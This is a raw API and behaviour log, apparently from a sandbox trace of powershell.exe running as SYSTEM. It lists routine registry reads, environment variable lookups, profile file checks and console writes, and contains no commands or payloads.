Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
User	Get Username	user_name_out = SYSTEM	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = SYSTEM	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = SYSTEM	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = HOMEDRIVE	1	Fn
Environment	Get Environment String	name = HOMEPATH	1	Fn
File	Get Info	filename = C:\, type = file_attributes	4	Fn
User	Get Username	user_name_out = SYSTEM	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = SYSTEM	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = SYSTEM	2	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
User	Get Username	user_name_out = SYSTEM	1	Fn
Environment	Get Environment String	name = MshEnableTrace	5	Fn
File	Get Info	filename = C:\Windows\system32, type = file_attributes	2	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
File	Get Info	filename = C:\, type = file_attributes	2	Fn
File	Get Info	filename = C:\Windows, type = file_attributes	2	Fn
File	Get Info	filename = C:\Windows\system32, type = file_attributes	2	Fn
File	Get Info	filename = C:\Windows, type = file_attributes	2	Fn
File	Get Info	filename = C:\Windows\system32, type = file_attributes	3	Fn
User	Get Username	user_name_out = SYSTEM	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Environment	Get Environment String	name = HomeDrive	1	Fn
Environment	Get Environment String	name = HomePath	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	11	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\system32\WindowsPowerShell\profile.ps1, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\system32\WindowsPowerShell\Microsoft.PowerShell_profile.ps1, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	7	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = SYSTEM	1	Fn

Thread 0x9d4

Category	Operation	Information	Success	Count	Logfile
Module	Unmap	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe		1	Fn

Thread 0x9e0

136

Category	Operation	Information	Count	Logfile
Environment	Get Environment String	name = MshEnableTrace	19	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PATH	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = MshEnableTrace	9	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	2	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Write	filename = CONOUT$, size = 79	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 79	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 62	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 17	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 57	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 79	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 25	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 54	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
